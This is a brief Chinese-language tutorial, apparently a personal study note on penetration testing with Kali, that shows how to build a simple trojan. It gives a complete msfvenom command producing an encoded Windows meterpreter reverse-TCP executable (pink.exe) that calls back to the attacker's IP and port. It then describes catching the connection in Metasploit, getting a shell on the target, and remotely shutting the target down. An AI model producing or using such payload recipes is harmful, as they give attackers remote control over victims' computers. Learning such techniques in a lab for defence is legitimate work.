Kali——木马（一）

学习web渗透过程中的心得体会以及知识点的整理，方便我自己查找，也希望可以和大家一起交流。

—— 简易木马制作与应用 ——

一.流程

1. 首先确定靶机和攻击主机可以连通
2. 利用msfvenom创建木马程序
   msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=xxx.xxx.xxx.xxx(攻击主机的ip) LPORT=xxx(攻击主机的端口) -f exe >pink.exe

3. 查看目录，可以看到木马程序。
   
4. 打开msf，编辑远程模块，设置payload，具体流程如下图
   
   
   这里的lhost和lport填写的内容和第二步填写的内容相同
   
5. 输入exploit，同时在靶机点击运行木马程序，在攻击主机就可以看到连接成功的消息。输入shell进入靶机系统。
   
6. 可以看到有些乱码，我们消除这些乱码。
   chcp 437
   
7. 也可以直接远程关闭靶机